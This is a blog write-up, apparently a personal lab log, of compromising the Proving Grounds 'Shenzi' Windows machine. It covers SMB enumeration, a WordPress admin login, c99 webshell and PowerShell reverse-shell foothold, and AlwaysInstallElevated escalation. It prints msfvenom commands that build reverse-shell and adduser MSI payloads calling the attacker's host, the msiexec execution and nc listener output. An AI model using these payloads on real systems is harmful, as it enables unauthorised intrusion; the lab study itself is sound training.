临渊羡鱼

退而结网

0%

Proving Grounds Practice - Shenzi

Posted on In , ,
Proving Grounds Practice Lab中Shenzi打靶过程记录

Difficulty

Medium

Scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
[*] ftp found on tcp/21.
     FileZilla ftpd 0.9.41


[*] http found on tcp/80.
    Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
    Welcome to XAMPP
    img  icons Webalizer


[*] msrpc found on tcp/135.

[*] netbios-ssn found on tcp/139.

[*] http found on tcp/443.

[*] microsoft-ds found on tcp/445.
    annoymous found default passwords
        mysql: root: empty
        Mercury:  newuser: wampp
        webdav: xampp-dav-unsecure: ppmax2011
        wordpress: admin: FeltHeadwallWight357
        phpmyadmin: root: secret/http

21 ftp

无法登录

80/443 xampp

Xampp默认页面,

页面上phpInfo页面发现有shenzi用户

phpadmin提示只能local network才能访问,使用burpsuite bypasswaf插件尝试绕过,无法成功

Grok3:xammp 会直接取clientip, 因为中间也没有nginx之类的网关/代理

445 smb

可以匿名登录, 文件全部下载, password文件中发现

1
2
3
4
5
6
7
8
9
10
11
12
13
smbclient //192.168.111.55/Shenzi -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu May 28 23:45:09 2020
  ..                                  D        0  Thu May 28 23:45:09 2020
  passwords.txt                       A      894  Thu May 28 23:45:09 2020
  readme_en.txt                       A     7367  Thu May 28 23:45:09 2020
  sess_klk75u2q4rpgfjs3785h6hpipp      A     3879  Thu May 28 23:45:09 2020
  why.tmp                             A      213  Thu May 28 23:45:09 2020
  xampp-control.ini                   A      178  Thu May 28 23:45:09 2020

                12941823 blocks of size 4096. 6497008 blocks available
smb: \>

passwords.txt文件中发现了一些账号密码,分别记录后使用hydra爆破下smb和ftp都以失败告终 hydra -l shenzi -P pass.txt -s 21 192.168.184.55 ftp

readme_en.txt中发现一段mailtodesk会把邮件内容写到本地文件,一番搜索尝试没有结果

在xampp-contorl.ini中看到启动了mysql和apache,其他没有更多发现

搞不定了,查看hit: Enumerate SMB shares to find an important file. Then, use some guesswork to locate the Wordpress website.

80端口也用wpsacn扫了,看来是目录不对,猜测是/shenzi/, 访问 http://192.168.111.55/shenzi/wp-admin ,使用 admin:FeltHeadwallWight357登录成功

Foothold

wordpress利用方式

https://www.hackercoolmagazine.com/wordpress-reverse-shelling-multiple-methods/

直接修改404页面为c99 webshell

https://github.com/phpwebshell/c99shell/blob/main/c99.php

revshell.com生成powershell反弹shell命令

复制后执行,得到shenzi powershell

1
2
3
4
5
6
rlwrap nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.184.55] 61137
id
PS C:\xampp\htdocs\shenzi\wp-content\plugins\malicious> whoami
shenzi\shenzi

Escalation

首先测试一下只能本地访问的数据库,mysql -u root无密码登录成功,但是找不到什么有用信息

alwaysInstallElevated

上传winpeas收集信息, 点击链接查看一下

https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#alwaysinstallelevated

扩展阅读: https://www.hackingarticles.in/windows-privilege-escalation-alwaysinstallelevated/

如果启用了这两个寄存器(值为 0x1),那么任何权限的用户都可以 NT AUTHORITY\SYSTEM 的身份安装(执行)*.msi 文件。

利用方式:

  1. 本地生成msi文件 msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.165 LPORT=443 -f msi ~/pentestools/tmp/r.msi

文档中还额外提供了uac的利用方式

msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi #No uac format
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi #Using the msiexec the uac wont be prompted

  1. 在目标机器上执行 msiexec /qn /i r.msi
1
2
C:\users\shenzi>msiexec /quiet /qn /i rr.msi
msiexec /quiet /qn /i rr.msi
1
2
3
4
5
6
7
8
9
rlwrap nc -nvlp 443
listening on [any] 443 ...
connect to [192.168.45.165] from (UNKNOWN) [192.168.111.55] 51913
Microsoft Windows [Version 10.0.19042.1526]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

插曲:msiexec /quiet /qn /i rr.msi在反弹的powershell中怎么都成功不了,使用怀疑是powershell的问题,执行cmd想切到cmd试试,但是发现也切换不了,最后msfvenom生成一个反弹cmd exe,重新执行msiexec获取system权限

反思

  1. 收集信息阶段,收集到很多信息,怎么甄别哪个是最有可能利用的呢,想不到shenzi目录啊
  2. 提权时发现alwaysInstallElevated应该有意识地先查一下